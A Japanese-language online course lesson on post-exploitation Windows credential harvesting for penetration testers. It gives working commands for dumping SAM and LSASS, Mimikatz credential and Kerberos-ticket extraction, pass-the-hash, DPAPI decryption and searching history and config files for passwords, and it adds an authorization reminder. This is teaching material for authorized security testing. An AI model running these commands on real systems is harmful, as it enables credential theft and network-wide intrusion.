0Pricing
Ethical Hacking Academy · レッスン

認証情報の収集

秘密情報をダンプします

「認証情報の収集」はCoddyKit上の無料Ethical Hacking Academyレッスンです。 これはレッスン4/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはEthical Hacking Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Ethical Hacking Academyコースには全4レッスンが含まれています。

なぜ認証情報を収集するのか

SYSTEMに到達した後でも、本当の獲得目標は多くの場合認証情報です — パスワードハッシュ、平文パスワード、そして横展開やドメインへの到達を可能にするチケットです。認証情報の収集によって、1台の端末からネットワーク全体へと攻撃を広げられます。

SAMデータベース

ローカルアカウントのハッシュはSAMレジストリハイブに保存され、SYSTEMハイブ内のキーで暗号化されています。SYSTEMアクセスがあれば両方をダンプし、オフラインでNTLMハッシュを抽出できます。

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCAL

LSASSメモリ

LSASSプロセスは、ログオン中のユーザーの認証情報をメモリ上に保持しています — 平文の認証情報や再利用可能なNTLMハッシュ、Kerberosチケットが含まれることもあります。LSASSのダンプは、最も価値の高い収集手法です。

rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp full

Mimikatz

Mimikatzは、認証情報を抽出する代表的なツールです。sekurlsa::logonpasswordsはLSASSから認証情報を取得します。また、チケットの抽出、pass-the-hash、SAMのダンプも実行できます。

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

Pass-the-Hash

ハッシュをクラックする必要がない場合も多くあります — pass-the-hashでは、NTLMハッシュを直接使って認証します。そのため、ローカル管理者の認証情報を共有しているマシン間では、ハッシュをダンプするだけで横展開できます。

pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>

キャッシュされたドメイン認証情報

ドメイン参加済みのマシンは、ユーザーがオフラインでログインできるよう、直近のログオン情報(MSCache/DCC2)をキャッシュします。これらのキャッシュされたハッシュはダンプしてオフラインでクラックできます(時間はかかります)。成功すれば、ドメインパスワードを取得できます。

secretsdump.py -system system.save -security security.save LOCAL

保存済み・格納済みの認証情報

Windowsは、Credential Manager / VaultおよびDPAPIで保護されたブロブ(保存済みのRDP、ブラウザーのパスワード、Wi-Fi情報)として認証情報を保存します。SYSTEMとマスターキーがあれば、これらを復号できます。

cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>

Kerberosチケットの窃取

Active Directoryでは、Mimikatzのsekurlsa::ticketsを使ってKerberos TGT/TGSをエクスポートできます。盗んだチケットによりpass-the-ticketが可能になり、ドメイン管理者のTGTはGolden Ticket/Silver Ticketによる永続化につながる可能性があります。

sekurlsa::tickets /export

秘密情報を含むファイルとスクリプト

簡単に見つかる情報を見落とさないでください。スクリプト、構成ファイル、履歴には、平文の認証情報が大量に含まれていることがあります。PowerShellの履歴、無人セットアップ用ファイル、IISのweb.configにある接続文字列には、パスワードが頻繁に保存されています。

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.config

クリーンアップとOPSEC

LSASSのダンプはEDRによって厳しく監視されており、Defender Credential Guardによってブロックされる場合があります。業務では、ステルス性の高い手法を優先し、ダンプファイルを削除し、アクセスした内容を報告書に記録してください。

倫理と認可

認証情報の収集は、組織の最も機密性の高い秘密を露出させます。ダンプした認証情報は安全に扱い、スコープを超えて外部へ持ち出さず、明示的な書面による認可のもとでのみ活動してください。

確認テスト

認証情報の収集に関する知識を確認しましょう。

まとめ

認証情報の収集について学びました。

  • ローカルハッシュにはSAM、ログオン中のユーザーとチケットにはLSASSをダンプします
  • Mimikatzはパスワード、ハッシュ、Kerberosチケットを抽出します
  • Pass-the-hash/pass-the-ticketにより、クラックせずに横展開できます
  • 秘密情報を探す際は、Credential Manager、DPAPI、構成ファイル、履歴ファイルを確認します

これでWindows権限昇格コースは完了です。

よくある質問

「認証情報の収集」レッスンは無料ですか?

はい。「認証情報の収集」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Ethical Hacking Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Ethical Hacking Academyコースには全4レッスンが含まれています。

「認証情報の収集」で何を学びますか?

秘密情報をダンプします ブラウザで直接実行するハンズオンコードでEthical Hacking Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。

Ethical Hacking Academyを始めるのに経験は必要ですか?

事前経験は必要ありません。CoddyKitのEthical Hacking Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン4/4です。

「認証情報の収集」レッスンにはどのくらい時間がかかりますか?

ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。

このEthical Hacking Academyレッスンでコードを書いて実行できますか?

はい。すべてのEthical Hacking Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。

このコースのすべてのレッスン

  1. Windowsの列挙
  2. サービスの設定ミス
  3. トークン偽装
  4. 認証情報の収集
← Ethical Hacking Academyに戻る